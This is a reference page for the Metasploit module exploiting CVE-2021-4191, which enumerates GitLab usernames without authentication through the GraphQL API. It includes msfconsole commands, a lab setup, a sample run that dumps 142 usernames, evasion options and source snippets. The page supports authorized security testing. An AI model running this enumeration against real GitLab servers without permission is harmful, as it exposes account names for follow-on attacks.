GitLab GraphQL API User Enumeration - Metasploit
This page contains detailed information about how to use the auxiliary/scanner/http/gitlab_graphql_user_enum metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.
Module Overview
Name: GitLab GraphQL API User Enumeration
Module: auxiliary/scanner/http/gitlab_graphql_user_enum
Source code: modules/auxiliary/scanner/http/gitlab_graphql_user_enum.rb
Disclosure date: 2022-02-25
Last modification time: 2022-03-11 07:19:09 +0000
Supported architecture(s): -
Supported platform(s): -
Target service / protocol: http, https
Target network port(s): 80, 443, 3000, 8000, 8008, 8080, 8443, 8880, 8888
List of CVEs: CVE-2021-4191
This module queries the GitLab GraphQL API without authentication to acquire the list of GitLab users (CVE-2021-4191). The module works on all GitLab versions from 13.0 up to 14.8.2, 14.7.4, and 14.6.5.
Module Ranking and Traits
Module Ranking:
- normal: The exploit is otherwise reliable, but depends on a specific version and can't (or doesn't) reliably autodetect. More information about ranking can be found here.
Stability:
- crash-safe: Module should not crash the service.
Side Effects:
- ioc-in-logs: Module leaves signs of a compromise in a log file (Example: SQL injection data found in HTTP log).
Basic Usage
This module is a scanner module, and is capable of testing against multiple hosts.
msf > use auxiliary/scanner/http/gitlab_graphql_user_enum
msf auxiliary(gitlab_graphql_user_enum) > show options
... show and set options ...
msf auxiliary(gitlab_graphql_user_enum) > set RHOSTS ip-range
msf auxiliary(gitlab_graphql_user_enum) > exploit
Other examples of setting the RHOSTS option:
Example 1:
msf auxiliary(gitlab_graphql_user_enum) > set RHOSTS 192.168.1.3-192.168.1.200
Example 2:
msf auxiliary(gitlab_graphql_user_enum) > set RHOSTS 192.168.1.1/24
Example 3:
msf auxiliary(gitlab_graphql_user_enum) > set RHOSTS file:/tmp/ip_list.txt
Required Options
- RHOSTS: The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
Knowledge Base
Vulnerable Application
Description
This module queries the GitLab GraphQL API without authentication to acquire the list of GitLab users (CVE-2021-4191). The module works on all GitLab versions from 13.0 up to 14.8.2, 14.7.4, and 14.6.5.
Exploitation will result in acquiring a list of valid GitLab usernames.
Installation
GitLab 13.10.2 on Ubuntu 20.04.2 x64
- Download GitLab 13.10.2
- Install openssh-server (
sudo apt install openssh-server
) - Install GitLab (
sudo dpkg -i gitlab-ce_13.10.2-ce.0_amd64.deb
) - Modify the
external_url
in/etc/gitlab/gitlab.rb
to something likeexternal_url http://localhost
- Run
sudo gitlab-ctl reconfigure
- Done!
To add a lot of users try something like this:
$ set -B
$ for i in {50..250}; do
curl -vv -X POST "http://10.0.0.6/api/v4/[email protected]&username=test$i&name=test$i&reset_password=True"
done
That should create 200 users with names such as "test50", "test51", etc.
Verification Steps
- Follow the above instructions to install GitLab 13.10.2
- Do:
use auxiliary/scanner/http/gitlab_graphql_user_enum
- Do:
set RHOST <ip>
- Do:
run
- You should get a list of usernames in loot.
Options
TARGETURI
Specifies GitLab's base URI. Although an unpopular configuration, GitLab does support use of a relative URL.
Scenarios
GitLab 14.4.1 on Ubuntu 20.04.2 x64. More than 100 users triggers paging logic.
msf6 > use auxiliary/scanner/http/gitlab_graphql_user_enum
msf6 auxiliary(scanner/http/gitlab_graphql_user_enum) > set RHOST 10.0.0.13
RHOST => 10.0.0.13
msf6 auxiliary(scanner/http/gitlab_graphql_user_enum) > set RPORT 80
RPORT => 80
msf6 auxiliary(scanner/http/gitlab_graphql_user_enum) > set SSL false
[!] Changing the SSL option's value may require changing RPORT!
SSL => false
msf6 auxiliary(scanner/http/gitlab_graphql_user_enum) > run
[+] Enumerated 142 GitLab users
[+] Userlist stored at /home/albinolobster/.msf4/loot/20220311065704_default_10.0.0.13_gitlab.users_704600.txt
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/http/gitlab_graphql_user_enum) > cat /home/albinolobster/.msf4/loot/20220311065704_default_10.0.0.13_gitlab.users_704600.txt
[*] exec: cat /home/albinolobster/.msf4/loot/20220311065704_default_10.0.0.13_gitlab.users_704600.txt
test150
test149
test148
test147
test146
test145
test144
test143
test142
test141
test140
test139
test138
test137
test136
test135
test134
test133
test132
test131
test130
test129
test128
test127
test126
test125
test124
test123
test122
test121
test120
test119
test118
test117
test116
test115
test114
test113
test112
test111
test110
test109
test108
test107
test106
test105
test104
test103
test102
test101
test100
test99
test98
test97
test96
test95
test94
test93
test92
test91
test90
test89
test88
test87
test86
test85
test84
test83
test82
test81
test80
test79
test78
test77
test76
test75
test74
test73
test72
test71
test70
test69
test68
test67
test66
test65
test64
test63
test62
test61
test60
test59
test58
test57
test56
test55
test54
test53
test52
test51
test50
testuser
test39
test35
test34
test33
test32
test31
test30
test29
test28
test27
test26
test25
test24
test23
test22
test21
test20
test18
test19
test17
test16
test15
test14
test13
test12
test11
test10
test9
test8
test7
test6
test5
test4
test3
test2
test1
test
support-bot
alert-bot
root
msf6 auxiliary(scanner/http/gitlab_graphql_user_enum) >
Go back to menu.
Msfconsole Usage
Here is how the scanner/http/gitlab_graphql_user_enum auxiliary module looks in the msfconsole:
msf6 > use auxiliary/scanner/http/gitlab_graphql_user_enum
msf6 auxiliary(scanner/http/gitlab_graphql_user_enum) > show info
Name: GitLab GraphQL API User Enumeration
Module: auxiliary/scanner/http/gitlab_graphql_user_enum
License: Metasploit Framework License (BSD)
Rank: Normal
Disclosed: 2022-02-25
Provided by:
jbaines-r7
mungsul
Module side effects:
ioc-in-logs
Module stability:
crash-safe
Check supported:
No
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
RPORT 443 yes The target port (TCP)
SSL true no Negotiate SSL/TLS for outgoing connections
TARGETURI / yes Base path
THREADS 1 yes The number of concurrent threads (max one per host)
VHOST no HTTP server virtual host
Description:
This module queries the GitLab GraphQL API without authentication to
acquire the list of GitLab users (CVE-2021-4191). The module works
on all GitLab versions from 13.0 up to 14.8.2, 14.7.4, and 14.6.5.
References:
https://nvd.nist.gov/vuln/detail/CVE-2021-4191
https://about.gitlab.com/releases/2022/02/25/critical-security-release-gitlab-14-8-2-released/#unauthenticated-user-enumeration-on-graphql-api
https://www.rapid7.com/blog/post/2022/03/03/cve-2021-4191-gitlab-graphql-api-user-enumeration-fixed/
Module Options
This is a complete list of options available in the scanner/http/gitlab_graphql_user_enum auxiliary module:
msf6 auxiliary(scanner/http/gitlab_graphql_user_enum) > show options
Module options (auxiliary/scanner/http/gitlab_graphql_user_enum):
Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
RPORT 443 yes The target port (TCP)
SSL true no Negotiate SSL/TLS for outgoing connections
TARGETURI / yes Base path
THREADS 1 yes The number of concurrent threads (max one per host)
VHOST no HTTP server virtual host
Advanced Options
Here is a complete list of advanced options supported by the scanner/http/gitlab_graphql_user_enum auxiliary module:
msf6 auxiliary(scanner/http/gitlab_graphql_user_enum) > show advanced
Module advanced options (auxiliary/scanner/http/gitlab_graphql_user_enum):
Name Current Setting Required Description
---- --------------- -------- -----------
DOMAIN WORKSTATION yes The domain to use for Windows authentication
DigestAuthIIS true no Conform to IIS, should work for most servers. Only set to false for non-IIS servers
FingerprintCheck true no Conduct a pre-exploit fingerprint verification
HttpClientTimeout no HTTP connection and receive timeout
HttpPassword no The HTTP password to specify for authentication
HttpRawHeaders no Path to ERB-templatized raw headers to append to existing headers
HttpTrace false no Show the raw HTTP requests and responses
HttpTraceColors red/blu no HTTP request and response colors for HttpTrace (unset to disable)
HttpTraceHeadersOnly false no Show HTTP headers only in HttpTrace
HttpUsername no The HTTP username to specify for authentication
SSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL
23, SSL3, TLS1, TLS1.1, TLS1.2)
ShowProgress true yes Display progress messages during a scan
ShowProgressPercent 10 yes The interval in percent that progress should be shown
UserAgent Mozilla/5.0 (Macintosh; Intel Mac OS X 12_2_1) AppleWebKit no The User-Agent header to use for all requests
/537.36 (KHTML, like Gecko) Chrome/98.0.4758.81 Safari/537
.36
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
Auxiliary Actions
This is a list of all auxiliary actions that the scanner/http/gitlab_graphql_user_enum module can do:
msf6 auxiliary(scanner/http/gitlab_graphql_user_enum) > show actions
Auxiliary actions:
Name Description
---- -----------
Evasion Options
Here is the full list of possible evasion options supported by the scanner/http/gitlab_graphql_user_enum auxiliary module in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):
msf6 auxiliary(scanner/http/gitlab_graphql_user_enum) > show evasion
Module evasion options:
Name Current Setting Required Description
---- --------------- -------- -----------
HTTP::header_folding false no Enable folding of HTTP headers
HTTP::method_random_case false no Use random casing for the HTTP method
HTTP::method_random_invalid false no Use a random invalid, HTTP method for request
HTTP::method_random_valid false no Use a random, but valid, HTTP method for request
HTTP::pad_fake_headers false no Insert random, fake headers into the HTTP request
HTTP::pad_fake_headers_count 0 no How many fake headers to insert into the HTTP request
HTTP::pad_get_params false no Insert random, fake query string variables into the request
HTTP::pad_get_params_count 16 no How many fake query string variables to insert into the request
HTTP::pad_method_uri_count 1 no How many whitespace characters to use between the method and uri
HTTP::pad_method_uri_type space no What type of whitespace to use between the method and uri (Accepted: space, tab, apache)
HTTP::pad_post_params false no Insert random, fake post variables into the request
HTTP::pad_post_params_count 16 no How many fake post variables to insert into the request
HTTP::pad_uri_version_count 1 no How many whitespace characters to use between the uri and version
HTTP::pad_uri_version_type space no What type of whitespace to use between the uri and version (Accepted: space, tab, apache)
HTTP::uri_dir_fake_relative false no Insert fake relative directories into the uri
HTTP::uri_dir_self_reference false no Insert self-referential directories into the uri
HTTP::uri_encode_mode hex-normal no Enable URI encoding (Accepted: none, hex-normal, hex-noslashes, hex-random, hex-all, u-normal, u-all, u-random)
HTTP::uri_fake_end false no Add a fake end of URI (eg: /%20HTTP/1.0/../../)
HTTP::uri_fake_params_start false no Add a fake start of params to the URI (eg: /%3fa=b/../)
HTTP::uri_full_url false no Use the full URL for all HTTP requests
HTTP::uri_use_backslashes false no Use back slashes instead of forward slashes in the uri
HTTP::version_random_invalid false no Use a random invalid, HTTP version for request
HTTP::version_random_valid false no Use a random, but valid, HTTP version for request
Go back to menu.
Error Messages
This module may fail with the following error messages:
Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.
The target didn't respond with 200 OK
Here is a relevant code snippet related to the "The target didn't respond with 200 OK" error message:
68: 'uri' => normalize_uri(target_uri.path, '/api/graphql'),
69: 'ctype' => 'application/json',
70: 'data' => graphql_query
71: })
72:
73: fail_with(Failure::UnexpectedReply, "The target didn't respond with 200 OK") unless res&.code == 200
74: fail_with(Failure::UnexpectedReply, "The target didn't respond with an HTTP body") unless res.body
75:
76: user_json = res.get_json_document
77: fail_with(Failure::UnexpectedReply, "The target didn't return a JSON body") if user_json.nil?
78:
The target didn't respond with an HTTP body
Here is a relevant code snippet related to the "The target didn't respond with an HTTP body" error message:
69: 'ctype' => 'application/json',
70: 'data' => graphql_query
71: })
72:
73: fail_with(Failure::UnexpectedReply, "The target didn't respond with 200 OK") unless res&.code == 200
74: fail_with(Failure::UnexpectedReply, "The target didn't respond with an HTTP body") unless res.body
75:
76: user_json = res.get_json_document
77: fail_with(Failure::UnexpectedReply, "The target didn't return a JSON body") if user_json.nil?
78:
79: nodes = user_json.dig('data', 'users', 'nodes')
The target didn't return a JSON body
Here is a relevant code snippet related to the "The target didn't return a JSON body" error message:
72:
73: fail_with(Failure::UnexpectedReply, "The target didn't respond with 200 OK") unless res&.code == 200
74: fail_with(Failure::UnexpectedReply, "The target didn't respond with an HTTP body") unless res.body
75:
76: user_json = res.get_json_document
77: fail_with(Failure::UnexpectedReply, "The target didn't return a JSON body") if user_json.nil?
78:
79: nodes = user_json.dig('data', 'users', 'nodes')
80: fail_with(Failure::UnexpectedReply, 'Could not find nodes in the JSON body') if nodes.nil?
81:
82: user_json
Could not find nodes in the JSON body
Here is a relevant code snippet related to the "Could not find nodes in the JSON body" error message:
75:
76: user_json = res.get_json_document
77: fail_with(Failure::UnexpectedReply, "The target didn't return a JSON body") if user_json.nil?
78:
79: nodes = user_json.dig('data', 'users', 'nodes')
80: fail_with(Failure::UnexpectedReply, 'Could not find nodes in the JSON body') if nodes.nil?
81:
82: user_json
83: end
84:
85: ##
No GitLab users were enumerated.
Here is a relevant code snippet related to the "No GitLab users were enumerated." error message:
154: user_json = do_request(query_paging_info)
155: query_paging_info = parse_json(user_json, users)
156: end
157:
158: if users.empty?
159: print_error('No GitLab users were enumerated.')
160: else
161: print_good("Enumerated #{users.length} GitLab users")
162: users_string = users.join("\n") + "\n"
163: store_userlist(users_string, service)
164: end
Go back to menu.
Related Pull Requests
References
- CVE-2021-4191
- https://about.gitlab.com/releases/2022/02/25/critical-security-release-gitlab-14-8-2-released/#unauthenticated-user-enumeration-on-graphql-api
- https://www.rapid7.com/blog/post/2022/03/03/cve-2021-4191-gitlab-graphql-api-user-enumeration-fixed/
See Also
Check also the following modules related to this module:
- auxiliary/scanner/http/gitlab_login
- auxiliary/scanner/http/gitlab_user_enum
- exploit/multi/http/gitlab_exif_rce
- exploit/multi/http/gitlab_file_read_rce
- exploit/multi/http/gitlab_shell_exec
- auxiliary/scanner/http/apache_userdir_enum
- auxiliary/scanner/http/dlink_user_agent_backdoor
- auxiliary/scanner/http/drupal_views_user_enum
- auxiliary/scanner/http/jira_user_enum
- auxiliary/scanner/http/manageengine_deviceexpert_user_creds
- auxiliary/scanner/http/sap_businessobjects_user_brute
- auxiliary/scanner/http/sap_businessobjects_user_brute_web
- auxiliary/scanner/http/sap_businessobjects_user_enum
- auxiliary/scanner/http/squiz_matrix_user_enum
- auxiliary/scanner/http/surgenews_user_creds
- auxiliary/scanner/http/synology_forget_passwd_user_enum
- auxiliary/scanner/http/cisco_ironport_enum
- auxiliary/scanner/http/enum_wayback
- auxiliary/scanner/http/influxdb_enum
- auxiliary/scanner/http/infovista_enum
- auxiliary/scanner/http/jenkins_enum
- auxiliary/scanner/http/ntlm_info_enumeration
- auxiliary/scanner/http/radware_appdirector_enum
- auxiliary/scanner/http/rfcode_reader_enum
- auxiliary/scanner/http/sap_businessobjects_version_enum
- auxiliary/scanner/http/sentry_cdu_enum
- auxiliary/scanner/http/sevone_enum
- auxiliary/scanner/http/tomcat_enum
- auxiliary/scanner/http/wordpress_login_enum
Authors
- jbaines-r7
- mungsul
Version
This page has been produced using Metasploit Framework version 6.1.36-dev. For more modules, visit the Metasploit Module Library.
Go back to menu.